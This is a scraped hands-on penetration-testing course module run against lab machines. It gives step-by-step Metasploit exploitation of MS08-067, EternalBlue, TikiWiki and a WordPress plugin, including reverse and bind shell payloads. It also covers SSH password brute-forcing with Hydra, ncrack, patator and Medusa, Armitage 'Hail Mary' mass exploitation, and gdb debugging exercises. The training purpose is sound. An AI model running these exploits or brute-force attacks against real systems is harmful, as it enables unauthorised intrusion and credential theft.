Penetration Testing Steps
Module 01: Penetration Testing Steps
1 Hour Remaining
Instructions
Resources
Help
100%Penetration Testing StepsScenarioIn this lab you will
Exploitation
Exercise 1: Search for Exploits using Searchsploit ToolScenarioThe objective of this lab is to get the students to use the searchsploit tool for searching exploits in Kali Linux. The following activities will be performed:
In this lab, the following activities were learned:
As a proficient tester, we need to use a variety of tools to provide us with the data that we need for analysis. There are many to choose from, and which one you select is largely a matter of personal preference. Having said that, with respect to exploitation there are a number of automatic or toolkits to choose from. It is imperative you work with a variety of targets, practice frequently and often. Ensuring you progress through the skills, making the targets harder and harder, start with easy targets, and work your way to the harder ones.
The objective of this lab is to help students learn to identify vulnerabilities, link an exploit to a vulnerability, review the exploit code, and then attempts to exploit a target. The following activities will be performed:
In this lab, the following activities were learned:
As a proficient tester, we need to use a variety of tools to provide us with the data that we need for analysis. There are many to choose from, and which one you select is largely a matter of personal preference. With respect to exploitation, there are a number of automatic or toolkits to choose from, and the most popular one is Metasploit and we will review it in this exercise.
The objective of this lab is to help students learn to identify vulnerabilities, link an exploit with a vulnerability, and find the exploit for the vulnerability using the search feature within Metasploit. Next, we will attempt to exploit the finding.
The following activities will be performed:
In this lab, the following activities were learned:
As a proficient tester, we need to use a variety of tools to provide us with the data that we need for analysis. There are many to choose from, and which one you select is largely a matter of personal preference. We also have a tool in the open source realm that provides us the capability to manage engagements, and is a front-end for the Metasploit framework, this tool is Armitage.
The objective of this lab is to help students learn to identify vulnerabilities, link an exploit with a vulnerability, and find the exploit for the vulnerability using the Armitage front-end to Metasploit, then attempt to exploit the finding.
The following activities will be performed:
In this lab, the following activities were learned:
In this lab you will
In this lab you will
Exercise 7: Inboundio ExploitScenarioIn this lab you will
Exercise 8: Metasploit Module ArchitectureScenarioIn this lab you will
Exercise 10: Adding an Exploit to MetasploitScenarioIn this lab you will
Module 01: Penetration Testing Steps
1 Hour Remaining
Instructions
Resources
Help
100%Penetration Testing StepsScenarioIn this lab you will
- Review the process of professional security testing
- Perform validation of vulnerabilities
- Click Kali 2018.2, and type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Once you have logged in, open a terminal window and type nmap -sP 192.168.177.0/24 and press Enter.
This will provide us with the first step of our scanning methodology and that is the discovery of live systems. - Next we want to scan these target machines for their open ports which is the 2nd step of our scanning methodology. In the terminal window type nmap -sS 192.168.177.100,252 and press Enter.
- Once you have completed the scan, we next want to perform the 3rd step of the scanning methodology and we can do this now, in the terminal window type nmap -sV 192.168.177.100,252 and press Enter.
While you wait for the scan to complete, you can start to identify interesting information about your discovered targets, in this case, both of these boxes are Windows, the next thing you want to look at is the potential attack surface on both of the targets, so we can start to think about what we are going to attack first.
From the results of the scan, we can now see that we have an old version of Internet Explorer as well as the Microsoft SQL Server 2000. Both of these are showing us that we have significant risk to our clients network from this machine. Think of it as, the network is at critical risk.
Scroll down to view the older version Microsoft SQL Server 2000 version. - The next scan that we want to do is run the Nmap everything scan, and that is the A option, so in the terminal window type nmap -A 192.168.177.100,252 and press Enter.
This scan will take some time to complete, but it will provide you the most accurate assessment of the operating system as well as the information from the enumeration of the smb or other “friendly” protocols.
The results show we have two operating sytems:- Windows 7 Service Pack One
- Windows Server 2003 Service Pack Two
- The next step in our methodology is to identify vulnerabilities, we could run a scanner like Nessus, which you probably have done, or since we have a Windows Server 2003 machine, and a Windows 7 machine, we can use Metasploit and try two of the most famous vulnerabilities for the machines. We could also check for the vulnerability using the Nmap Scripting Engine scripts, and this is something we will cover in more detail later.
- In the terminal window, type msfconsole and press Enter to start up the Metasploit tool.
- Once the tool loads, type search ms08-067 and press Enter this will search for the exploit for the famous Microsoft Server Service vulnerability. You will get a message about using slow search, but that is okay for now, we will see how to take care of that later when we work with the databases that are contained within Metasploit.
Once the search returns, take a look at the information, particularly the rank, and you see it is ranked as great and we like to see that as often as possible, or we are not sure our exploit will work. - In the msfconsole type use exploit/windows/smb/ms08_067_netapi and press Enter. This should place you in the exploit, and once you are in there type info and press Enter to read about the exploit. It is always a good idea to read about the exploits, and even test them in a test lab before ever deploying them as a professional penetration tester.
As you see from the information it is a vulnerability in the parser of the server service that is being exploited. It also can bypass NX which is a protection measure that does not allow execution on the stack. - Once you have reviewed the details, type show options and press Enter. Review the options that are available for the exploit, in this case, we are only missing one required item and that is the target address, type set RHOST 192.168.177.252 and press Enter.
- Type show payloads and press Enter. This will list out the available payloads for the exploit. Type set payload windows/meterpreter/bind_tcp and press Enter.
- Before we attempt the exploit, type show targets and press Enter. You can see there are a lot of targets for this exploit, and this is because of the different nuances of the stack with different service packs. Once you are ready, type exploit and press Enter.
- If all goes well you will see that a Meterpreter session is opened and the exploit is successful, we always say that exploitation is not 100%, but the ms08-067 gets us close to that.
You now have the powerful meterpreter shell on the machine and from here it is a matter of what you want to do, but for this first lab we wanted to review the process to refresh your memory. The process is the key, it does not change, only the tools and the targets change.
The key here would be to record the information about the target, and moreover the screenshots of the exploit success.
Close the terminal window. - We have another box, and that is the Windows 7 machine. There was a pretty famous attack against Windows that resulted in many malware infections, and that is what we will look for now. Again, we will cover this multiple times and in great details as we progress through the course, but for now we want to practice the process, so we can move on to more topics.
The vulnerability we are looking for is the Eternal Blue vulnerability that resulted in the Wanna Cry attack, this vulnerability is Microsoft Bulletin ms17-010, so that is what we will search for, in Metasploit. Launch a new terminal window, type msfconsole and press Enter to launch metasploit framework. In the msfconsole type search ms17-010 and press Enter. - Of the results that come back, we want the exploit, so that is the one to concentrate on, and as you see there, the rank is average, so that can be a concern. Type use exploit/windows/smb/ms17_010_eternalblue and press Enter.
- This will place you in the exploit, and once you are there you can type info and press Enter to read about the exploit, and as the description says, the exploit does not always work.
- If you type show targets and press Enter you will see that within Metasploit, you only have two targets that have exploits for, and if your machine was something other than Windows 7 and Server 2008 R2 then you would not be able to use this exploit.
- After you have reviewed the information, it is time to set the target and try our luck, type set RHOST 192.168.177.100 and press Enter.
- Once the target is set, you can look at the options by typing show options and press Enter.
- When you are ready, type exploit and press Enter.
- Once the exploit starts you can read the output of what it is doing, and you are looking for WIN, so if it says FAIL then keep waiting, after some time it should either give up or you get the WIN.
Once you have the shell, it is the same process as before, and that again is dependent on the scope of work and rules of engagement that you have negotiated with the client. - Type netstat -an and press Enter, you should see your connection into the exploited machine.
- We have accomplished what we want to in this lab, so we can close out from the lab and complete the exercise.
The one thing to remember is, both of these vulnerabilities are in smb, and require port 445 to be open as the vector of attack, so that is the first thing that we have to discover in our testing, and it is part of professional penetration testing, showing the client their attack surface and moreover their risk.
- Review the process of professional security testing
- Perform validation of vulnerabilities
Exploitation
Exercise 1: Search for Exploits using Searchsploit ToolScenarioThe objective of this lab is to get the students to use the searchsploit tool for searching exploits in Kali Linux. The following activities will be performed:
- Start the searchsploit tool
- Search for exploits
- Type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Open the terminal window, type searchsploit and press Enter.
This will output the options for the command as shown in the screenshot. - As you can see, we can have up to three terms to search for, so we will attempt this now.
In a terminal window, type searchsploit wu-ftp remote and press Enter.
This will search for a Washington University FTP exploit that is remote. Even though it is rare that we will run into this version of ftp, it is possible, and the most important thing is the process, as it does not change for any additional searches.
The output of this command is shown in the screenshot. - The next step in the process is to look at the source code, then compile and build the code and see if we can exploit the vulnerability that we discovered. It is important to remember that exploitation is not 100%, so there are no guarantees.
We can also search from within the exploit framework Metasploit, but we will do that in a later exercise. - Close the terminal window.
In this lab, the following activities were learned:
- Start the searchsploit tool
- Search for exploits
As a proficient tester, we need to use a variety of tools to provide us with the data that we need for analysis. There are many to choose from, and which one you select is largely a matter of personal preference. Having said that, with respect to exploitation there are a number of automatic or toolkits to choose from. It is imperative you work with a variety of targets, practice frequently and often. Ensuring you progress through the skills, making the targets harder and harder, start with easy targets, and work your way to the harder ones.
The objective of this lab is to help students learn to identify vulnerabilities, link an exploit to a vulnerability, review the exploit code, and then attempts to exploit a target. The following activities will be performed:
- Conduct the scanning methodology against the machine
- Identify vulnerabilities
- Search for an exploit for the vulnerability
- Prepare the exploit
- Compile the exploit
- Attempt to exploit the machine
- Add information to the target database
- Type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- The first thing we want to do is to scan the target with Nmap and see what we can find.
Open a terminal window, type nmap -f -n -Pn -v -p- -T4 192.168.100.231 and press Enter.- We use a fragmented scan to make the scan harder to detect.
- In the advanced section, we will cover evasion in more detail.
This scan will take a while to complete as it is scanning all ports, this is noted by the “-p-’” option. - At this time, you should be filling in your target database.
- Do you notice anything of interest on this target? To look deeper at a machine we will use enumeration. There are a number of ways to do this, and several have been covered in previous exercises. So we will use another method that has not been covered. We use a very fast scanner called Unicom scan. This is another tool we can use validation.
In a terminal window, type unicornscan -i eth1 -mT -r 500 -I 192.168.100.231 and press Enter.- The –r option is the rate, in this example 500 packets per second
- To look at the UDP ports, type unicornscan -mU -r 500 -I 192.168.100.231 in the terminal window and press Enter.
- We now have additional information, so we can make a more directed scan with our favorite tool Nmap.
In a terminal window, type nmap -n -sTUV -pT:22,80,111,139,143,445,1024,U:111,137 192.168.100.231 and press Enter.
We are telling Nmap to only scan the ports we specify and then return the version information on them. A sample of the output from this scan is shown in the screenshot. - We can use the power of Nmap and its scripting engine to further enumerate information from the target.
In a terminal window, type nmap –sC 192.168.100.231 and press Enter.
A sample of this command output is shown in the screenshot. - We have an interesting port on the machine, and this port initially causes Nmap to not correctly identify the OS, so we will take a closer look at this now. We want to use our smb tools since this is smb service.
In a terminal window, type smbclient –L 192.168.100.231 -N and press Enter.
A sample of the output is shown in the screenshot. - We now have a version of Samba that the machine is using, and we know there have been vulnerabilities in the past in Samba. We will turn our focus to this version of Samba. Remember, the target is the specific version or revision of the software.
- Earlier we covered a number of ways to search for vulnerabilities and exploits. We will not repeat that process here, but you can use any of the techniques we have showed thus far, we will use the searchsploit tool here.
In a terminal window, type searchsploit samba and press Enter.
A sample of the output of this command is shown in the screenshot. - We do have a number of vulnerabilities that we have exploits for when it comes to Samba. Now, the challenge is which one do we use?
We have to select one that is part of our version of the software, and then look for others that provide a privileged level of access. This largely comes down to trial and error, that is try and if it does not work, try harder
Welcome to the world of a professional security tester. - We will save you some time, we have discovered a 3.4.7 version of Samba, and most of these exploits will fail when you try to exploit it. There is a chance it might work, but nothing is guaranteed, the most important thing is the process.
- Since this is a deliberately vulnerable machine. There are many vulnerabilities we can exploit. Open the Firefox browser and enter http://192.168.100.231/tikiwiki.
An example of this is shown in the screenshot. The thing to note here is the version of the TikiWiki installed. - Now, we want to search for a vulnerability and see if we can find an exploit to leverage the vulnerability.
In a terminal window, type searchsploit tikiwiki and press Enter.
An example of the search is shown in the screenshot. - From here, the process is to try and find a version that meets ours, and then either run it with the interpreter for perl, python, etc., or compile the code. In this case, you are welcome to experiment, or use a little help as we will show in the next 2 labs.
- Close all the windows.
In this lab, the following activities were learned:
- Conduct the scanning methodology against the machine
- Identify vulnerabilities
- Search for an exploit for the vulnerability
- Prepare the exploit
- Compile the exploit
- Attempt to exploit the machine
- Add information to the target database
As a proficient tester, we need to use a variety of tools to provide us with the data that we need for analysis. There are many to choose from, and which one you select is largely a matter of personal preference. With respect to exploitation, there are a number of automatic or toolkits to choose from, and the most popular one is Metasploit and we will review it in this exercise.
The objective of this lab is to help students learn to identify vulnerabilities, link an exploit with a vulnerability, and find the exploit for the vulnerability using the search feature within Metasploit. Next, we will attempt to exploit the finding.
The following activities will be performed:
- Scan the target
- Identify the vulnerabilities
- Find the exploit for the vulnerability
- Prepare the exploit
- Exploit the machine
- Add information to the target database
- Type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Metasploit uses PostgreSQL as its database so it needs to be launched first.
Open a terminal window, type service postgresql start and press Enter.
You can verify that PostgreSQL is running by checking the output of ss -ant and making sure that port 5432 is listening. - With PostgreSQL up and running, we next need to create and initialize the msf database.
In a terminal window, type msfdb init and press Enter. - Now that the PostgreSQL service is up and running and the database is initialized. We need to launch msfconsole.
In a terminal window, type msfconsole and press Enter.
After a few moments, you should see some graphic and a screen similar to the one shown in the screenshot.
As you can see, in this instance the tool has 1519 exploits in it. - A powerful feature of the tool is we can perform other steps of our methodology and not just exploitation. We will now run an Nmap scan from within the tool. Enter the following command:
db_nmap -nO -sTU -pT:22,80,111,139,443,32768,U:111,137,32768 192.168.100.231
A sample of the output of this command is shown in the screenshot.
Note: That is a letter "O" and not a zero in the command. - We will now take a look at the target database capability for Metasploit. In the terminal window with the Metasploit prompt, type hosts and press Enter. The output of this command is shown in the screenshot.
- The power of the database here is, we can review our targets without leaving the framework, and to get an example of this we enter services –p 22.
This would return all hosts running ssh. A sample of this is shown in the screenshot. - There are many features within the Metasploit tool, and it is highly recommended that you work with the tool and practice with it often. We have looked at features enough, let us see if we can exploit.
- We know from the previous exercise, there is a vulnerability in the TikiWiki service that is running on our target machine. We can search for exploits in Metasploit using the search feature, enter search tikiwiki.
- As you can see by looking at the output as shown in the screenshot, there are a number of exploits for the TikiWiki application.
The main column for us here is the rank. We want to select high ranking exploits, so we have a better chance of success. - We can research and see what works. But for the time being, we will try one that should work.
Here we will use exploit/unix/webapp/tikiwiki_graph_formula_exec exploit.
In the terminal window with the Metasploit prompt, type use exploit/unix/webapp/tikiwiki_graph_formula_exec and press Enter. - To obtain the information that is needed for an exploit, we use the info command, enter info. The output of this command is shown in the screenshot.
- We now need to set the options. To get a list of them, enter show options.
- With this exploit, we do not have that many options to use. So we can set these now, the RHOST is the target and the exploit only has the one target, some exploits will have an extensive target list. Enter set RHOST 192.168.100.231.
- The next thing we need to do is get the payload, so enter show payloads.
We will use what is called a reverse shell, simply that is when the target connects back to us. Once the payload is set, we will have to look at our options again. Enter set payload generic/shell_reverse_tcp. - Enter show options.
We will set the following options:- set LHOST 192.168.100.203
- set LPORT 666
- Once we have entered the options, you can check them by entering show options again.
You should see output similar to that shown in the screenshot. - We are now ready to attempt the exploit. It is always recommended that you capture the traffic used, so you can analyze it and have a better understanding of how the exploit works. Start a capture on Wireshark.
In another terminal window, enter wireshark and start capture on eth1 interface. - In your Metasploit terminal window, enter exploit.
- If all goes well you will see a command session start and we now have used Metasploit and returned a shell. A sample of the output is shown in the screenshot.
- We set the port at 666, and this can be any port we want. Just remember the administrator might know the default port of Metasploit and block it. At least if they have been to CAST 614 they will.
You will also notice the exploits opens many shells, just background the sessions with the <CTL>+<z> command and then enter y. - Enter sessions -l to list the sessions, and then enter sessions -i # where the # is the number of the sessions to interact with. Type ls command to see the list.
The output of ls command is shown in the screenshot. - As with all exploits, we should be looking at this on Wireshark.
In the Wireshark window:- Select the packet going from source (192.168.100.203) to the target (192.168.100.231)
- Right-click and select Follow | TCP Stream
- The next thing to look at in Wireshark, is the reverse shell connection. An example of this with the shell command is shown in the screenshot.
Note: To find the packet of a reverse shell connection, pick some words from the output of ls command (Refer Step 24) and then search for same in Wireshark using the search filter. - Close all the windows.
In this lab, the following activities were learned:
- Scan the target
- Identify the vulnerabilities
- Find the exploit for the vulnerability
- Prepare the exploit
- Exploit the machine
- Add information to the target database
As a proficient tester, we need to use a variety of tools to provide us with the data that we need for analysis. There are many to choose from, and which one you select is largely a matter of personal preference. We also have a tool in the open source realm that provides us the capability to manage engagements, and is a front-end for the Metasploit framework, this tool is Armitage.
The objective of this lab is to help students learn to identify vulnerabilities, link an exploit with a vulnerability, and find the exploit for the vulnerability using the Armitage front-end to Metasploit, then attempt to exploit the finding.
The following activities will be performed:
- Scan from within Armitage
- Manage targets in Armitage
- Exploite targets with Armitage
- Add information to the target database
- Click Kali 2018.2. Move the screensaver in upward direction using mouse.
- Type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Open a terminal window, type /etc/init.d/postgresql start and press Enter to start the PostgreSQL service.
- To start the Armitage application, navigate to Applications | 08 - Exploitation Tools | armitage.
- This will result in the tool starting and the window being displayed that is shown in the screenshot.
Accept the default settings and click Connect.
In the next window, click Yes. - This will start a connection process that hopefully will eventually be successful. There are some instances where you have to try this several times to get it to work.
- The first thing we want to do is to make sure we have our targets. If you did not see the target, then click on the Hosts menu. Here, you can manually add hosts, import hosts, perform Nmap scan, etc.
Click on Nmap Scan | Intense Scan from the Host menu and at the pop-up window, enter the IP block of our targets 192.168.100.100,231. The scan will take a minimum of 10 minutes to complete. We have other targets, but we will concentrate on these two for this exercise.
Note: Here, we are using Windows 2003 Server (192.168.100.100) and OWASP (192.168.100.231) machines as a target. - Now, we have our targets listed, as shown in the screenshot.
Note: If for some reason, your hosts are not showing, this does happen sometimes in armitage, you can manually add them with the Hosts | Add Hosts option from the Host menu. - We next want to find the vulnerabilities, and Armitage makes this very simple. Click on Attacks | Find Attacks.
- In the window that opens, next click on OK once the attacks are discovered as indicated in the screenshot.
- There are many features within the Armitage tool, and it is highly recommended that you work with the tool and practice with it often. We have looked at features enough, let us see if we can exploit with the tool.
By selecting each target, we could run one attack at a time, or we have an option for running all attacks, so we will try that first.
For each target, click on Attacks | Hail Mary. In the window that opens, click Yes and just wait. - The tool will run through all of the possible attacks, and if it is successful, it indicates this with a set of lightning bolts as shown in the screenshot.
As indicated in the screenshot, there are a number of exploits found for the targets.
Note: We do not always have success with the Hail Mary. So if it fails, perform the same attack again. - In the Hail Mary field, scroll down and go to the bottom. You will see the Active sessions section containing the information about the exploits. You can see one of our machines is vulnerable to the tikiwiki exploit.
- We do not always have success with the Hail Mary, so if it fails, we go back and do our exploitation the same way we always do with researching it.
We know the TikiWiki exploit works on the one machine, so right-click on the Linux (OWASP) machine, and select Attack | webapp | tikiwiki_graph_formula_exec. There are many webapp findings, so it takes a while to locate it. - This will bring up the window as shown in the screenshot allowing us to set the Metasploit options. Place a check mark in the Use a reverse connection then click on Launch.
- We have mentioned before that exploitation is not 100%, but if it all goes well and this is a good exploit day you should see something similar to the screen shown in the screenshot.
- Now that we have an exploited box, if you right-click on it you will see there are a number of options that are available to us, so it would be a good idea to explore and practice with this tool as it is an excellent tool for our toolbox.
The attached screenshot shows some of the available options when we have exploited a machine. - Right-click on the Linux (OWASP) machine, and select Shell 2 | Interact. It will open a shell as shown in the screenshot.
- Type ls in the shell and press Enter to view the directory contents of files and directories on the target machine.
You should see output similar to that shown in the screenshot. - Sometimes the box will not fall over, and no matter what you try it just does not fall, this is why exploitation is not 100%. In most professional security testing you do, you will not need the box to fall over. Your job is to draft a report of the findings and not exploit the targets 100%.
- Close all the windows.
In this lab, the following activities were learned:
- Scan from within Armitage
- Manage targets in Armitage
- Exploite targets with Armitage
- Add information to the target database
In this lab you will
- Use the searchsploit tool to research exploits
- Click Kali 2018.2, and type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Open a terminal window, and type man searchsploit and press Enter. Exit the man page by typing q and press Enter.
- After you have exited, type searchsploit -h and press Enter. This will show you the usage of the tool.
- Type searchsploit samba remote and press Enter. This will search for all of the samba exploits, and as you can see there are many of them, so lets reduce our search and make it more granular, type searchsploit samba remote and press Enter.
As the search implies this search will only show the samba exploits that are remote accessible, and that will reduce the returned results significantly
As you look through the list you can see that there are a variety of different exploits, written in a variety of drifting scripting languages as well as the C language. - The challenge here is finding which one works for your attack. Next, type searchploit smb remote and press Enter. This is similar to the samba search, but as you can see this search returns less than the samba search did and we can use this to make our search more effective.
- We have accomplished what we wanted to in this lab, so we can clean up from the exercise and close all programs.
- Use the searchsploit tool to research exploits
In this lab you will
- Use the a variety of tools to conduct a remote password attack
- Type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Open a terminal window, and type cd /usr/share/wordlists and press Enter.
- One of the tools we like to use on this is Hydra, type man hydra and press Enter. As the man pages says hydra is a powerful tool that supports numerous protocols. Take a few minutes and look over the details in the man page
Exit the man page by pressing q. - Next, type hydra -l kevin -P lpt.txt 192.168.177.250 ssh and press Enter. We have customized the dictionary file so the time in the lab is not as long as a brute force could take using one of the other dictionaries.
Thus you have gained the password of the target machine using hydra.
192.168.177.250 is the IP address of the Ubuntu 64-bit machine. - We are now ready to run patator, type man patator and press Enter. Read about the tool, and you see it is a multi-purpose brute-forcer tool and we want to run it, so take a few minutes and review the man page details and see the different modules that are available.
Exit the man page by pressing q. - In a terminal window type patator ssh_login host=192.168.177.250 user=kevin password=FILE0 0=lpt.txt and press Enter. As it runs you will see it process through the list, look for the SSH banner and then you will see the password that was used.
- The next tool we will look at is the tool ncrack, as before, type man ncrack and press Enter. Take a few moments and review the man page so you are familiar with the tool, once you are done reading the man page, exit the man page by pressing q.
- Type ncrack -v --user kevin -P lpt.txt ssh://192.168.177.250 and press Enter. This will run the tool, and you wait for the results. After a few moments you should see the results displayed that the tool did discover the password and it is kevinpw.
Once you got the password press Ctrl+C to stop the attack. - The next tool we want to look at is Medusa, type man medusa and press Enter when the man page opens, take a few minutes to review the information about the tool. Once you have finished reading the information, exit the man page by pressing q.
- We are now ready to run the tool, type medusa -h 192.168.177.250 -u kevin -P lpt.txt -M ssh and press Enter. Once the scan runs, after a few moments you should see the password is discovered.
- We have accomplished what we wanted to in this lab, so we can clean up from the exercise and close all programs.
- Use the a variety of tools to conduct a remote password attack.
Exercise 7: Inboundio ExploitScenarioIn this lab you will
- Use the process and methodology you have used in the course to discover a weakness in Wordpress and then attempt to exploit the discovered weakness
- Click Kali 2018.2, and type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Open a terminal window and type whatweb http://192.168.177.245:81/wordpress and press Enter.
We are going to use the whatweb tool to assess the web server and applications that are running on the machine. This should return a great deal of information about the server and the applications that are on the machine.
Take a few minutes and review the information that has been returned, and you will notice that we have a version of Wordpress on the machine, and since Wordpress has been known for many vulnerabilities we know this might provide us a method of attack.
As you review the information you will also discover that this machine is running the version 4.9.4 of Wordpress, so we can use that as a reference point for looking to find vulnerabilities. - Now that we have some data, lets look at another tool, type wpscan --url http://192.168.177.245:81/wordpress --enumerate u and press Enter.
At the prompt accept the default of N because we do not have an Internet connection here. We do not see a lot here with respect to the users, but we do see an interesting plugin that is vulnerable. - So lets go ahead and scan for plugins installed, type wpscan --url http://192.168.177.245:81/wordpress --enumerate p and press Enter.
From the results of the scan, we have some other findings, but we want the ones in red, and the Inboundio marketing plug in is a good target vector to start with.
We could use searchsploit and look for an exploit on this and you are welcome to do this, or we could do the old fashioned way of using Metasploit to do our heavy lifting, and this is the approach we will take here. - Start the database services by typing service postgresql start and press Enter.
- To launch msfconsole, type msfconsole and press Enter.
- When Metasploit launches, type search inboundio and press Enter. Search for an exploit for our finding. This will return an exploit with a rating of excellent which is what we like.
- In the msfconsole type use exploit/unix/webapp/wp_inboundio_marketing_file_upload and press Enter. This should enter you into the exploit, as always, type info and press Enter to read about the exploit.
As you see from the description, it does not fit our findings exactly, but it is sufficient enough of a match, as a reminder, even if the exploit is a perfect match, it does not mean success. - Type the following commands in the msfconsole:
Type set RHOST 192.168.177.245 and press Enter.
Type set RPORT 81 and press Enter.
Type set TARGETURI /wordpress and press Enter. - Once you have entered the target details, you are ready to attempt the exploitation, type exploit and press Enter. Wait for a shell, if it is a good exploit day you should have one.
- In the meterpreter shell type getuid and press Enter.
- This will show that you are user www-data, so that means we have to escalate privileges from here and that will be covered later.
We have accomplished what we wanted to in this lab, so we can clean up from the exercise and close all programs.
- Use the process and methodology you have used in the course to discover a weakness in Wordpress and then attempt to exploit the discovered weakness
Exercise 8: Metasploit Module ArchitectureScenarioIn this lab you will
- Take an exploit from the Metasploit and review it
- Click Kali 2018.2, and type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- The module we will investigate is the one that is used to detect the version of http. The first thing we want to do is take a look at the Metasploit core info, type cd /usr/share/metasploit-framework/lib/rex/proto/http and press Enter in the terminal window.
- To view the contents type ls -X and press Enter. All these files contains a variety of HTTP methods, which include functions to set up a connection, the GET and POST request, response handling
- We want to open the module, so navigate to Places and click Computer. Computer window appears, navigate to /usr/share/metasploit-framework/modules/auxiliary/scanner/http. In http folder scroll down and right-click on http_version.rb and click Open With Text Editor from the context menu.
- Take a few minutes to review the information, we will next look at one mixin. Once the review is done close the Text editor window.
- Navigate to Places and click Computer. Computer window appears, navigate to /usr/share/metasploit-framework/lib/rex/proto/http. In http folder right-click on client.rb and click Open With Text Editor from the context menu.
- This is the code for the mixin, and as you can see here there are the routines that we need for handling the sockets and it is why we can do the things that we need to do to extract the data from the site.
The key to this routine is in the defined class- self.hostname = host
- self.port = port.to_i
- self.context = context
- self.ssl = ssl
- self.ssl_version = ssl_version
- self.proxies = proxies
- self.username = username
- self.password = password
This is the process you should follow when you are working as a practitioner, and professional security and penetration tester. Always investigate the code that is being used BEFORE you ever deploy it on a site. - We have accomplished what we wanted to in this lab, so we can clean up from the exercise and close all programs
- Take an exploit from the Metasploit and review it
- Create a small program and work through the basic debugging process
- Click Kali 2018.2, and type root in the Username field and click Next.
- Type toor in the Password field and click Sign In.
- Open a text editor of your choice (here, leafpad). Leafpad window appears, enter the following code in the leafpad and then navigate to File and click Save As:
#include <iostream>
#include <cmath>
using namespace std;
int ComputeFactorial(int number) {
int fact = 0;
for (int j = 1; j <= number; j++) {
fact = fact * j;
}
return fact;
}
double ComputeSeriesValue(double x, int n) {
double seriesValue = 0.0;
double xpow = 1;
for (int k = 0; k <= n; k++) {
seriesValue += xpow / ComputeFactorial(k);
xpow = xpow * x;
}
return seriesValue;
}
int main() {
cout << "This program is used to compute the value of the following series : " << endl;
cout << "(x^0)/0! + (x^1)/1! + (x^2)/2! + (x^3)/3! + (x^4)/4! + …….. + (x^n)/n! " << endl;
cout << "Please enter the value of x : " ;
double x;
cin >> x;
int n;
cout << endl << "Please enter an integer value for n : " ;
cin >> n;
cout << endl;
double seriesValue = ComputeSeriesValue(x, n);
cout << "The value of the series for the values entered is "
<< seriesValue << endl;
return 0;
} - Save As window appears, click root as location to save, and type buggy.cpp in the Name field and click Save. Close the Text editor window after you saved the file.
- Once you have the code entered, it is fun time! Try and compile it. Open a terminal window, and type g++ -g buggy.cpp -o buggy and press Enter.
- Once the program has complied, type ./buggy and press Enter to execute the code. This should run your program, just a simple program that has a bug that no matter the data entered it will report the answer as inf.
This is not a cyber security type of problem, but it is one that can help us learn to use the gdb basics. - We are now ready to start the debugger, type gdb buggy and press Enter. This will load our code into the debugger, so we can investigate it.
- Look at the source code and set a breakpoint at line 32. In gdb terminal type b 32 and press Enter, which is double seriesValue = ComputeSeriesValue(x, n);.
- Now, we start to run the program in the debugger. Type run and press Enter.
If you need to supply the command-line arguments for the execution of the program, simply include them after the run command, just as normally done on the command line. - The program starts running and asks us for the input. Let's enter the values as x=2 and n=3. The expected output value is 5. The following is a snapshot of the program running in the debugger:
This program is used to compute the value of the following series :
(x^0)/0! + (x^1)/1! + (x^2)/2! + (x^3)/3! + (x^4)/4! + …….. + (x^n)/n!
Please enter the value of x : 2
Please enter an integer value for n : 3
Breakpoint 1, main () at buggy.cpp:32
32 double seriesValue = ComputeSeriesValue(x, n);
Note that the program execution stopped at our first (and only) breakpoint. - Step into the ComputeSeriesValue() function. To step into a function call, we use the following command:
(gdb) type step and press Enter
ComputeSeriesValue (x=2, n=3) at buggy.cpp:12
12 double seriesValue = 0.0;
At this point, the program control is at the first statement of the function ComputeSeriesValue (x=2, n=3). - Next let's step through the program until we get into ComputeFactorial.
(gdb) type next and press Enter
13 double xpow=1; - (gdb) type n and press Enter
14 for (int k = 0; k <= n; k++) { - (gdb) (press Enter)
15 seriesValue += xpow / ComputeFactorial(k) ; - (gdb) type s and press Enter
ComputeFactorial (number=0) at buggy.cpp:5
5 int fact=0; - Here we use the next command, which is similar to step except it will step over (instead of into) functions. The distinction doesn't matter here since there are no functions. You may use the shortest, unambiguous spelling of a GDB command to save some typing. Here we use n and s instead of next and step, respectively. If the command is simply a repeat of the previous command, you can just hit return, which will execute the last command. Finally, we step (with s) into ComputeFactorial(). (If we'd used next, it would have stepped over ComputeFactorial.)
Where are we?
If you want to know where you are in the program's execution (and how, to some extent, you got there), you can view the contents of the stack using the backtrace command as follows:
(gdb) type bt and press Enter
Watching changes, we can step through the program and examine the values using the print command. - (gdb) type n and press Enter
6 for (int j = 1; j <= number; j++) { - (gdb) type n and press Enter
9 return fact; - (gdb) type n and press Enter
10 } - (gdb) type print fact and press Enter
$1 = 0 - (gdb) type n and press Enter
16 xpow = xpow * x; - Type quit and press Enter to exit from the debugger.
Type y and press Enter in Quit anyway warning. Minimize the terminal window. - The print command (abbreviated p) reveals that the value of fact never changes. Note that the function is returning a value of 0 for the function call ComputeFactorial(number=0). This is an ERROR!
By taking a closer look at the values printed above, we realize that we are computing fact=fact * j where fact has been initialized to 0; fact should have been initialized to 1.
Navigate to root location and open buggy.cpp file with any text editor of your choice, buggy.cpp file opens up in the text editor you have choosen.
Change the following line int fact = 0; to int fact = 1; as shown in the screenshot, and then Save the file and minimize it. - Maximize the terminal window, and type g++ -g buggy.cpp -o buggy and press Enter.
- Type ./buggy and press Enter to run the program, and enter the values of the x and n when prompted, you should get the expected output.
Close all the windows.
Now that we have looked at a buggy piece of code, not lets look at one that causes a core dump. - Open a new text editor of your choice (here, leafpad), and type the following code:
#include <stdio.h>
void main()
{
char *temp = "Paras";
int i;
i=0;
temp[3]='F';
for (i =0 ; i < 5 ; i++ )
printf("%c\n", temp[i]);
}
Navigate to File and click Save As. - Save As window appears, type coredump.c in the name field and choose the root as location to save the file and click Save.
Minimize the text editor window. - Open a terminal window, and type gcc coredump.c -g -o coredump and press Enter.
- Type ./coredump and press Enter. This will result in a segmentation fault. When we get a segmentation fault, we might have a core that we can look at for assistance depending on how the machine has been setup.
- Type gdb coredump core and press Enter.
- In this instance we do not have the core dump, but it is okay, we can still get the data from the debugger, type run and press Enter in gdb terminal.
The program will provide us the location of the problem, and you can see it is in line 8, and the programmer is assigning a literal string to a pointer and we cannot manipulate it as the code is trying to do.
